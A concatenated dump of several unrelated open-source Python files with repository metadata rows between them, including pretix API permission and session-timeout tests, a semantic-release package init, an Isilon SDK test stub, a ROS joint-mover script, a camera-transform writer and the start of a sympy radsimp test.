# We avoid simply doing an ls in that directory to ensure we don't
# run into old files
index_file = os.path.join(args.camera_dir, args.camera_type + "_index.txt")
camera_files = []
with open(index_file, "r") as f:
for image_file in f:
image_file = image_file.rstrip()
image_file = os.path.basename(image_file)
m = re.match("^(.*?)\.jpg", image_file)
if not m:
print("Expecting a .jpg file, but got: " + image_file)
in_cam = os.path.join(args.camera_dir, m.group(1) + suffix)
camera_files.append(in_cam)
out_cam = args.undistorted_image_dir + "/" + os.path.basename(in_cam)
m = re.match("^(.*?)" + suffix, out_cam)
if not m:
print("Could not match desired expression.")
sys.exit(1)
out_cam = m.group(1) + ".cam"
if not os.path.exists(in_cam):
print("Cannot find: " + in_cam)
sys.exit(1)
M = np.loadtxt(in_cam) # camera to world
M = np.linalg.inv(M) # world to camera
print("Writing: " + out_cam)
with open(out_cam, "w") as g:
# translation
g.write("%0.17g %0.17g %0.17g " % (M[0][3], M[1][3], M[2][3]))
# rotation
g.write(
"%0.17g %0.17g %0.17g %0.17g %0.17g %0.17g %0.17g %0.17g %0.17g\n"
% (
M[0][0],
M[0][1],
M[0][2],
M[1][0],
M[1][1],
M[1][2],
M[2][0],
M[2][1],
M[2][2],
)
)
            # normalized intrinsics
g.write(
"%0.17g %0.17g %0.17g %0.17g %0.17g %0.17g\n"
% (nf, d0, d1, paspect, ncx, ncy)
)
# Save the name of the camera transforms. This will be used later
# for individual texturing of each image and camera.
camera_list = os.path.join(args.camera_dir, args.camera_type + "_transforms.txt")
with open(camera_list, "w") as f:
print("Writing: " + camera_list)
for camera in camera_files:
f.write(camera + "\n")
| 30.725 | 94 | 0.5893 |
29d3365891f0cbf8a13be972e1ff6ed0efcdfa12 | 1,052 | py | Python | isi_sdk_7_2/test/test_compatibilities_ssd_active_active_item.py | mohitjain97/isilon_sdk_python | a371f438f542568edb8cda35e929e6b300b1177c | [
"Unlicense"
] | 24 | 2018-06-22T14:13:23.000Z | 2022-03-23T01:21:26.000Z | isi_sdk_7_2/test/test_compatibilities_ssd_active_active_item.py | mohitjain97/isilon_sdk_python | a371f438f542568edb8cda35e929e6b300b1177c | [
"Unlicense"
] | 46 | 2018-04-30T13:28:22.000Z | 2022-03-21T21:11:07.000Z | isi_sdk_7_2/test/test_compatibilities_ssd_active_active_item.py | mohitjain97/isilon_sdk_python | a371f438f542568edb8cda35e929e6b300b1177c | [
"Unlicense"
] | 29 | 2018-06-19T00:14:04.000Z | 2022-02-08T17:51:19.000Z | # coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 2
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import isi_sdk_7_2
from isi_sdk_7_2.models.compatibilities_ssd_active_active_item import CompatibilitiesSsdActiveActiveItem # noqa: E501
from isi_sdk_7_2.rest import ApiException
class TestCompatibilitiesSsdActiveActiveItem(unittest.TestCase):
"""CompatibilitiesSsdActiveActiveItem unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testCompatibilitiesSsdActiveActiveItem(self):
"""Test CompatibilitiesSsdActiveActiveItem"""
# FIXME: construct object with mandatory attributes with example values
# model = isi_sdk_7_2.models.compatibilities_ssd_active_active_item.CompatibilitiesSsdActiveActiveItem() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 25.658537 | 126 | 0.747148 |
b55efd3bfb834dcd6b46876872e4070f520c902f | 450 | py | Python | semantic_release/__init__.py | MattPColeman/python-semantic-release | 09af5f11a6134c8711b59a5bcd57c917c0c91b5e | [
"MIT"
] | 445 | 2015-07-27T17:48:25.000Z | 2022-03-31T15:48:10.000Z | semantic_release/__init__.py | MattPColeman/python-semantic-release | 09af5f11a6134c8711b59a5bcd57c917c0c91b5e | [
"MIT"
] | 338 | 2015-07-27T18:44:52.000Z | 2022-03-31T11:38:53.000Z | semantic_release/__init__.py | MattPColeman/python-semantic-release | 09af5f11a6134c8711b59a5bcd57c917c0c91b5e | [
"MIT"
] | 168 | 2015-07-28T20:32:52.000Z | 2022-03-31T10:45:06.000Z | """Semantic Release
"""
__version__ = "7.23.0"
from .errors import UnknownCommitMessageStyleError # noqa; noqa
from .errors import ImproperConfigurationError, SemanticReleaseBaseError
def setup_hook(argv: list):
"""
A hook to be used in setup.py to enable `python setup.py publish`.
:param argv: sys.argv
"""
if len(argv) > 1 and argv[1] in ["version", "publish", "changelog"]:
from .cli import main
main()
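# Typical wiring in a project's setup.py (illustrative sketch):
# import sys
# try:
#     from semantic_release import setup_hook
#     setup_hook(sys.argv)
# except ImportError:
#     pass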
| 22.5 | 72 | 0.668889 |
08f51885f1d5299ca8ae85d211fc75ae5fea7b5b | 19,354 | py | Python | src/tests/api/test_permissions.py | gnomus/pretix | 9a9ae3e7807c5fce12adeabf5e2bb81e6b32fb38 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | src/tests/api/test_permissions.py | gnomus/pretix | 9a9ae3e7807c5fce12adeabf5e2bb81e6b32fb38 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | src/tests/api/test_permissions.py | gnomus/pretix | 9a9ae3e7807c5fce12adeabf5e2bb81e6b32fb38 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | import time
import pytest
from django.test import override_settings
from django.utils.timezone import now
from pretix.base.models import Organizer
event_urls = [
(None, ''),
(None, 'categories/'),
('can_view_orders', 'invoices/'),
(None, 'items/'),
('can_view_orders', 'orders/'),
('can_view_orders', 'orderpositions/'),
(None, 'questions/'),
(None, 'quotas/'),
('can_view_vouchers', 'vouchers/'),
(None, 'subevents/'),
(None, 'taxrules/'),
('can_view_orders', 'waitinglistentries/'),
('can_view_orders', 'checkinlists/'),
]
# Tuples of (HTTP method, required event permission or None, sub-URL, expected status when permitted)
event_permission_sub_urls = [
('get', 'can_view_orders', 'orders/', 200),
('get', 'can_view_orders', 'orderpositions/', 200),
('delete', 'can_change_orders', 'orderpositions/1/', 404),
('post', 'can_change_orders', 'orderpositions/1/price_calc/', 404),
('get', 'can_view_vouchers', 'vouchers/', 200),
('get', 'can_view_orders', 'invoices/', 200),
('get', 'can_view_orders', 'invoices/1/', 404),
('post', 'can_change_orders', 'invoices/1/regenerate/', 404),
('post', 'can_change_orders', 'invoices/1/reissue/', 404),
('get', 'can_view_orders', 'waitinglistentries/', 200),
('get', 'can_view_orders', 'waitinglistentries/1/', 404),
('post', 'can_change_orders', 'waitinglistentries/', 400),
('delete', 'can_change_orders', 'waitinglistentries/1/', 404),
('patch', 'can_change_orders', 'waitinglistentries/1/', 404),
('put', 'can_change_orders', 'waitinglistentries/1/', 404),
('post', 'can_change_orders', 'waitinglistentries/1/send_voucher/', 404),
('get', None, 'categories/', 200),
('get', None, 'items/', 200),
('get', None, 'questions/', 200),
('get', None, 'quotas/', 200),
('post', 'can_change_items', 'items/', 400),
('get', None, 'items/1/', 404),
('put', 'can_change_items', 'items/1/', 404),
('patch', 'can_change_items', 'items/1/', 404),
('delete', 'can_change_items', 'items/1/', 404),
('post', 'can_change_items', 'categories/', 400),
('get', None, 'categories/1/', 404),
('put', 'can_change_items', 'categories/1/', 404),
('patch', 'can_change_items', 'categories/1/', 404),
('delete', 'can_change_items', 'categories/1/', 404),
('post', 'can_change_items', 'items/1/variations/', 404),
('get', None, 'items/1/variations/', 404),
('get', None, 'items/1/variations/1/', 404),
('put', 'can_change_items', 'items/1/variations/1/', 404),
('patch', 'can_change_items', 'items/1/variations/1/', 404),
('delete', 'can_change_items', 'items/1/variations/1/', 404),
('get', None, 'items/1/addons/', 404),
('get', None, 'items/1/addons/1/', 404),
('post', 'can_change_items', 'items/1/addons/', 404),
('put', 'can_change_items', 'items/1/addons/1/', 404),
('patch', 'can_change_items', 'items/1/addons/1/', 404),
('delete', 'can_change_items', 'items/1/addons/1/', 404),
('get', None, 'subevents/', 200),
('get', None, 'subevents/1/', 404),
('get', None, 'taxrules/', 200),
('get', None, 'taxrules/1/', 404),
('post', 'can_change_event_settings', 'taxrules/', 400),
('put', 'can_change_event_settings', 'taxrules/1/', 404),
('patch', 'can_change_event_settings', 'taxrules/1/', 404),
('delete', 'can_change_event_settings', 'taxrules/1/', 404),
('get', 'can_view_vouchers', 'vouchers/', 200),
('get', 'can_view_vouchers', 'vouchers/1/', 404),
('post', 'can_change_vouchers', 'vouchers/', 201),
('put', 'can_change_vouchers', 'vouchers/1/', 404),
('patch', 'can_change_vouchers', 'vouchers/1/', 404),
('delete', 'can_change_vouchers', 'vouchers/1/', 404),
('get', None, 'quotas/', 200),
('get', None, 'quotas/1/', 404),
('post', 'can_change_items', 'quotas/', 400),
('put', 'can_change_items', 'quotas/1/', 404),
('patch', 'can_change_items', 'quotas/1/', 404),
('delete', 'can_change_items', 'quotas/1/', 404),
('get', None, 'questions/', 200),
('get', None, 'questions/1/', 404),
('post', 'can_change_items', 'questions/', 400),
('put', 'can_change_items', 'questions/1/', 404),
('patch', 'can_change_items', 'questions/1/', 404),
('delete', 'can_change_items', 'questions/1/', 404),
('get', None, 'questions/1/options/', 404),
('get', None, 'questions/1/options/1/', 404),
('put', 'can_change_items', 'questions/1/options/1/', 404),
('patch', 'can_change_items', 'questions/1/options/1/', 404),
('delete', 'can_change_items', 'questions/1/options/1/', 404),
('post', 'can_change_orders', 'orders/', 400),
('patch', 'can_change_orders', 'orders/ABC12/', 404),
('post', 'can_change_orders', 'orders/ABC12/mark_paid/', 404),
('post', 'can_change_orders', 'orders/ABC12/mark_pending/', 404),
('post', 'can_change_orders', 'orders/ABC12/mark_expired/', 404),
('post', 'can_change_orders', 'orders/ABC12/mark_canceled/', 404),
('post', 'can_change_orders', 'orders/ABC12/approve/', 404),
('post', 'can_change_orders', 'orders/ABC12/deny/', 404),
('post', 'can_change_orders', 'orders/ABC12/extend/', 400),
('post', 'can_change_orders', 'orders/ABC12/create_invoice/', 404),
('post', 'can_change_orders', 'orders/ABC12/resend_link/', 404),
('post', 'can_change_orders', 'orders/ABC12/regenerate_secrets/', 404),
('get', 'can_view_orders', 'orders/ABC12/payments/', 404),
('get', 'can_view_orders', 'orders/ABC12/payments/1/', 404),
('get', 'can_view_orders', 'orders/ABC12/refunds/', 404),
('get', 'can_view_orders', 'orders/ABC12/refunds/1/', 404),
('post', 'can_change_orders', 'orders/ABC12/payments/1/confirm/', 404),
('post', 'can_change_orders', 'orders/ABC12/payments/1/refund/', 404),
('post', 'can_change_orders', 'orders/ABC12/payments/1/cancel/', 404),
('post', 'can_change_orders', 'orders/ABC12/refunds/1/cancel/', 404),
('post', 'can_change_orders', 'orders/ABC12/refunds/1/process/', 404),
('post', 'can_change_orders', 'orders/ABC12/refunds/1/done/', 404),
('get', 'can_view_orders', 'checkinlists/', 200),
('post', 'can_change_event_settings', 'checkinlists/', 400),
('put', 'can_change_event_settings', 'checkinlists/1/', 404),
('patch', 'can_change_event_settings', 'checkinlists/1/', 404),
('delete', 'can_change_event_settings', 'checkinlists/1/', 404),
('post', 'can_create_events', 'clone/', 400),
('get', 'can_view_orders', 'cartpositions/', 200),
('get', 'can_view_orders', 'cartpositions/1/', 404),
('post', 'can_change_orders', 'cartpositions/', 400),
('delete', 'can_change_orders', 'cartpositions/1/', 404),
]
org_permission_sub_urls = [
('get', 'can_change_organizer_settings', 'webhooks/', 200),
('post', 'can_change_organizer_settings', 'webhooks/', 400),
('get', 'can_change_organizer_settings', 'webhooks/1/', 404),
('put', 'can_change_organizer_settings', 'webhooks/1/', 404),
('patch', 'can_change_organizer_settings', 'webhooks/1/', 404),
('delete', 'can_change_organizer_settings', 'webhooks/1/', 404),
('get', 'can_manage_gift_cards', 'giftcards/', 200),
('post', 'can_manage_gift_cards', 'giftcards/', 400),
('get', 'can_manage_gift_cards', 'giftcards/1/', 404),
('put', 'can_manage_gift_cards', 'giftcards/1/', 404),
('patch', 'can_manage_gift_cards', 'giftcards/1/', 404),
]
event_permission_root_urls = [
('post', 'can_create_events', 400),
('put', 'can_change_event_settings', 400),
('patch', 'can_change_event_settings', 200),
('delete', 'can_change_event_settings', 204),
]
@pytest.fixture
def token_client(client, team):
team.can_view_orders = True
team.can_view_vouchers = True
team.can_change_items = True
team.save()
t = team.tokens.create(name='Foo')
client.credentials(HTTP_AUTHORIZATION='Token ' + t.token)
return client
@pytest.mark.django_db
def test_organizer_allowed(token_client, organizer):
resp = token_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert resp.status_code == 200
@pytest.mark.django_db
def test_organizer_not_allowed(token_client, organizer):
o2 = Organizer.objects.create(slug='o2', name='Organizer 2')
resp = token_client.get('/api/v1/organizers/{}/events/'.format(o2.slug))
assert resp.status_code == 403
@pytest.mark.django_db
def test_organizer_not_allowed_device(device_client, organizer):
o2 = Organizer.objects.create(slug='o2', name='Organizer 2')
resp = device_client.get('/api/v1/organizers/{}/events/'.format(o2.slug))
assert resp.status_code == 403
@pytest.mark.django_db
def test_organizer_not_existing(token_client, organizer):
resp = token_client.get('/api/v1/organizers/{}/events/'.format('o2'))
assert resp.status_code == 403
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_allowed_all_events(token_client, team, organizer, event, url):
team.all_events = True
team.save()
resp = token_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
assert resp.status_code == 200
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_allowed_all_events_device(device_client, device, organizer, event, url):
resp = device_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
if url[0] is None or url[0] in device.permission_set():
assert resp.status_code == 200
else:
assert resp.status_code == 403
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_allowed_limit_events(token_client, organizer, team, event, url):
team.all_events = False
team.save()
team.limit_events.add(event)
resp = token_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
assert resp.status_code == 200
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_allowed_limit_events_device(device_client, organizer, device, event, url):
device.all_events = False
device.save()
device.limit_events.add(event)
resp = device_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
if url[0] is None or url[0] in device.permission_set():
assert resp.status_code == 200
else:
assert resp.status_code == 403
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_not_allowed(token_client, organizer, team, event, url):
team.all_events = False
team.save()
resp = token_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
assert resp.status_code == 403
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_not_allowed_device(device_client, organizer, device, event, url):
device.all_events = False
device.save()
resp = device_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
assert resp.status_code == 403
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_not_existing(token_client, organizer, url, event):
resp = token_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
assert resp.status_code == 403
@pytest.mark.django_db
@pytest.mark.parametrize("urlset", event_permission_sub_urls)
def test_token_event_subresources_permission_allowed(token_client, team, organizer, event, urlset):
team.all_events = True
if urlset[1]:
setattr(team, urlset[1], True)
team.save()
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/events/{}/{}'.format(
organizer.slug, event.slug, urlset[2]))
assert resp.status_code == urlset[3]
@pytest.mark.django_db
@pytest.mark.parametrize("urlset", event_permission_sub_urls)
def test_token_event_subresources_permission_not_allowed(token_client, team, organizer, event, urlset):
if urlset[1] is None:
team.all_events = False
else:
team.all_events = True
setattr(team, urlset[1], False)
team.save()
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/events/{}/{}'.format(
organizer.slug, event.slug, urlset[2]))
if urlset[3] == 404:
assert resp.status_code == 403
else:
assert resp.status_code in (404, 403)
@pytest.mark.django_db
@pytest.mark.parametrize("urlset", event_permission_root_urls)
def test_token_event_permission_allowed(token_client, team, organizer, event, urlset):
team.all_events = True
setattr(team, urlset[1], True)
team.save()
if urlset[0] == 'post':
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/events/'.format(organizer.slug))
else:
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/events/{}/'.format(organizer.slug, event.slug))
assert resp.status_code == urlset[2]
@pytest.mark.django_db
@pytest.mark.parametrize("urlset", event_permission_root_urls)
def test_token_event_permission_not_allowed(token_client, team, organizer, event, urlset):
team.all_events = True
setattr(team, urlset[1], False)
team.save()
if urlset[0] == 'post':
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/events/'.format(organizer.slug))
else:
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/events/{}/'.format(organizer.slug, event.slug))
assert resp.status_code == 403
@pytest.mark.django_db
def test_log_out_after_absolute_timeout(user_client, team, organizer, event):
session = user_client.session
session['pretix_auth_long_session'] = False
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 12 - 60
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 403
@pytest.mark.django_db
def test_dont_logout_before_absolute_timeout(user_client, team, organizer, event):
session = user_client.session
session['pretix_auth_long_session'] = True
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 12 + 60
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 200
@pytest.mark.django_db
@override_settings(PRETIX_LONG_SESSIONS=False)
def test_ignore_long_session_if_disabled_in_config(user_client, team, organizer, event):
session = user_client.session
session['pretix_auth_long_session'] = True
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 12 - 60
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 403
@pytest.mark.django_db
def test_dont_logout_in_long_session(user_client, team, organizer, event):
session = user_client.session
session['pretix_auth_long_session'] = True
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 12 - 60
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 200
@pytest.mark.django_db
def test_log_out_after_relative_timeout(user_client, team, organizer, event):
session = user_client.session
session['pretix_auth_long_session'] = False
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 6
session['pretix_auth_last_used'] = int(time.time()) - 3600 * 3 - 60
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 403
@pytest.mark.django_db
def test_dont_logout_before_relative_timeout(user_client, team, organizer, event):
session = user_client.session
session['pretix_auth_long_session'] = True
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 6
session['pretix_auth_last_used'] = int(time.time()) - 3600 * 3 + 60
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 200
@pytest.mark.django_db
def test_dont_logout_by_relative_in_long_session(user_client, team, organizer, event):
session = user_client.session
session['pretix_auth_long_session'] = True
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 5
session['pretix_auth_last_used'] = int(time.time()) - 3600 * 3 - 60
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 200
@pytest.mark.django_db
def test_update_session_activity(user_client, team, organizer, event):
t1 = int(time.time()) - 5
session = user_client.session
session['pretix_auth_long_session'] = False
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 5
session['pretix_auth_last_used'] = t1
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 200
assert user_client.session['pretix_auth_last_used'] > t1
@pytest.mark.django_db
@pytest.mark.parametrize("urlset", event_permission_sub_urls)
def test_device_subresource_permission_check(device_client, device, organizer, event, urlset):
resp = getattr(device_client, urlset[0])('/api/v1/organizers/{}/events/{}/{}'.format(
organizer.slug, event.slug, urlset[2]))
if urlset[1] is None or urlset[1] in device.permission_set():
assert resp.status_code == urlset[3]
else:
if urlset[3] == 404:
assert resp.status_code == 403
else:
assert resp.status_code in (404, 403)
@pytest.mark.django_db
@pytest.mark.parametrize("urlset", org_permission_sub_urls)
def test_token_org_subresources_permission_allowed(token_client, team, organizer, event, urlset):
team.all_events = True
if urlset[1]:
setattr(team, urlset[1], True)
team.save()
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/{}'.format(
organizer.slug, urlset[2]))
assert resp.status_code == urlset[3]
@pytest.mark.django_db
@pytest.mark.parametrize("urlset", org_permission_sub_urls)
def test_token_org_subresources_permission_not_allowed(token_client, team, organizer, event, urlset):
if urlset[1] is None:
team.all_events = False
else:
team.all_events = True
setattr(team, urlset[1], False)
team.save()
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/{}'.format(
organizer.slug, urlset[2]))
if urlset[3] == 404:
assert resp.status_code == 403
else:
assert resp.status_code in (404, 403)
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_staff_requires_staff_session(user_client, organizer, team, event, url, user):
team.delete()
user.is_staff = True
user.save()
resp = user_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
assert resp.status_code == 403
user.staffsession_set.create(date_start=now(), session_key=user_client.session.session_key)
resp = user_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
assert resp.status_code == 200
| 41.532189 | 118 | 0.677844 |
8a07036df3dec476a30b3c2242d77bf2005b0dfc | 451 | py | Python | pr2_robot/scripts/mover.py | kitu2007/RoboND-Perception-Project | e12fcf5afb7a4ef0b7c4d09d1841d04557f59edc | [
"MIT"
] | null | null | null | pr2_robot/scripts/mover.py | kitu2007/RoboND-Perception-Project | e12fcf5afb7a4ef0b7c4d09d1841d04557f59edc | [
"MIT"
] | null | null | null | pr2_robot/scripts/mover.py | kitu2007/RoboND-Perception-Project | e12fcf5afb7a4ef0b7c4d09d1841d04557f59edc | [
"MIT"
] | null | null | null |
import math
import rospy
from std_msgs.msg import Float64
def mover(topic, msg_type, value_fn):
pub_j1 = rospy.Publisher(topic, msg_type, queue_size=10)
rospy.init_node('robot_mover')
rate = rospy.Rate(10)
start_time = 0
while not start_time:
start_time = rospy.Time.now().to_sec()
while not rospy.is_shutdown():
        t = rospy.Time.now().to_sec() - start_time  # elapsed seconds since start
pub_j1.publish(value_fn(t))
rate.sleep()
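# Example invocation (topic name and value function are illustrative placeholders):
# if __name__ == '__main__':
#     try:
#         mover('/simple_arm/joint_1_position_controller/command', Float64,
#               lambda t: math.sin(2 * math.pi * 0.1 * t))
#     except rospy.ROSInterruptException:
#         pass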
| 19.608696 | 60 | 0.660754 |
c1c21036eeb45850a0bdd7a8c79231c6d41477f9 | 4,452 | py | Python | config/settings/base.py | devspoon/devspoon-django-default-structure | dd48fc0476dee2c89c68d29fca7d6084380de1c7 | [
"MIT"
] | null | null | null | config/settings/base.py | devspoon/devspoon-django-default-structure | dd48fc0476dee2c89c68d29fca7d6084380de1c7 | [
"MIT"
] | null | null | null | config/settings/base.py | devspoon/devspoon-django-default-structure | dd48fc0476dee2c89c68d29fca7d6084380de1c7 | [
"MIT"
] | null | null | null | """
Django settings for config project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
import os
from pathlib import Path
from decouple import config
from os.path import join
from django.contrib import messages
#from .sub_settings.email.gmail import *
from .sub_settings.email.sendinblue import *
#from .sub_settings.email.mailgun import *
# from .sub_settings.email.sendgrid import *
#from .sub_settings.email.aws_ses import *
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
ROOT_DIR = os.path.dirname(BASE_DIR)
TEMPLATE_DIR = os.path.join(ROOT_DIR, "templates")
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = config('SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
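# Example of reading such a flag with python-decouple (variable name and default
# are illustrative; the real DEBUG value may live in an environment-specific module):
# DEBUG = config('DEBUG', default=False, cast=bool)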
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'users',
"anymail",
'imagekit',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
AUTHENTICATION_BACKENDS = [
    'django.contrib.auth.backends.ModelBackend'  # default authentication backend
]
ROOT_URLCONF = 'config.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
"DIRS": [TEMPLATE_DIR],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'config.wsgi.application'
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
#LANGUAGE_CODE = "ko-kr"
LANGUAGE_CODE = 'en-us'
#TIME_ZONE = "Asia/Seoul"
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True  # when True, datetimes are stored internally in UTC
# ref : https://it-eldorado.tistory.com/13
# Automatically sets the default primary key (id/pk) field type for models
# ref :
# 1. https://dev.to/weplayinternet/upgrading-to-django-3-2-and-fixing-defaultautofield-warnings-518n
# 2. https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = "django.db.models.BigAutoField"
# Default login page URL
# Used by the login_required decorator and similar helpers
LOGIN_URL = "/users/login/"
# After login, redirect to the URL given by the "next" parameter if it is set
# If "next" is not given, redirect to the URL below
LOGIN_REDIRECT_URL = ""
# After logout, redirect to the URL given by the "next" parameter if it is set
# If "next" is not given, redirect to LOGOUT_REDIRECT_URL
# If LOGOUT_REDIRECT_URL is None (the default), the 'registration/logged_out.html' template is rendered
LOGOUT_REDIRECT_URL = LOGIN_REDIRECT_URL
# Custom user model to use for authentication: 'app_name.ModelName'
# AUTH_USER_MODEL = 'user.Usert'
SITE_ID = 1
# messages setting
MESSAGE_TAGS = {
messages.DEBUG: 'alert-info',
messages.INFO: 'alert-info',
messages.SUCCESS: 'alert-success',
messages.WARNING: 'alert-warning',
messages.ERROR: 'alert-danger',
}
# Django Session Timeout Code
SESSION_COOKIE_AGE = 1200 # second
SESSION_SAVE_EVERY_REQUEST = True
SESSION_EXPIRE_AT_BROWSER_CLOSE = True
# SESSION_COOKIE_SECURE = True # https
| 26.981818 | 100 | 0.721698 |
769ddcfaffaf2ea53de4ae6c673514c1939c837a | 17,178 | py | Python | env/lib/python3.8/site-packages/sympy/simplify/tests/test_radsimp.py | crimergio/linux_test | 5e688a06884ab10b4eaaad10a5d0df417a1c9b31 | [
"CC-BY-4.0"
] | 2 | 2019-05-18T22:36:49.000Z | 2019-05-24T05:56:16.000Z | env/lib/python3.8/site-packages/sympy/simplify/tests/test_radsimp.py | crimergio/linux_test | 5e688a06884ab10b4eaaad10a5d0df417a1c9b31 | [
"CC-BY-4.0"
] | null | null | null | env/lib/python3.8/site-packages/sympy/simplify/tests/test_radsimp.py | crimergio/linux_test | 5e688a06884ab10b4eaaad10a5d0df417a1c9b31 | [
"CC-BY-4.0"
] | 3 | 2019-05-18T21:32:31.000Z | 2019-07-26T11:05:46.000Z | from sympy import (
sqrt, Derivative, symbols, collect, Function, factor, Wild, S,
collect_const, log, fraction, I, cos, Add, O,sin, rcollect,
Mul, radsimp, diff, root, Symbol, Rational, exp, Abs)
from sympy.core.expr import unchanged
from sympy.core.mul import _unevaluated_Mul as umul
from sympy.simplify.radsimp import (_unevaluated_Add,
collect_sqrt, fraction_expand, collect_abs)
from sympy.testing.pytest import raises
from sympy.abc import x, y, z, a, b, c, d
def test_radsimp():
r2 = sqrt(2)
r3 = sqrt(3)
r5 = sqrt(5)
r7 = sqrt(7)
assert fraction(radsimp(1/r2)) == (sqrt(2), 2)
assert radsimp(1/(1 + r2)) == \
-1 + sqrt(2)
assert radsimp(1/(r2 + r3)) == \
-sqrt(2) + sqrt(3)
assert fraction(radsimp(1/(1 + r2 + r3))) == \
(-sqrt(6) + sqrt(2) + 2, 4)
assert fraction(radsimp(1/(r2 + r3 + r5))) == \
(-sqrt(30) + 2*sqrt(3) + 3*sqrt(2), 12)
assert fraction(radsimp(1/(1 + r2 + r3 + r5))) == (
(-34*sqrt(10) - 26*sqrt(15) - 55*sqrt(3) - 61*sqrt(2) + 14*sqrt(30) +
93 + 46*sqrt(6) + 53*sqrt(5), 71))
assert fraction(radsimp(1/(r2 + r3 + r5 + r7))) == (
(-50*sqrt(42) - 133*sqrt(5) - 34*sqrt(70) - 145*sqrt(3) + 22*sqrt(105)
+ 185*sqrt(2) + 62*sqrt(30) + 135*sqrt(7), 215))
z = radsimp(1/(1 + r2/3 + r3/5 + r5 + r7))
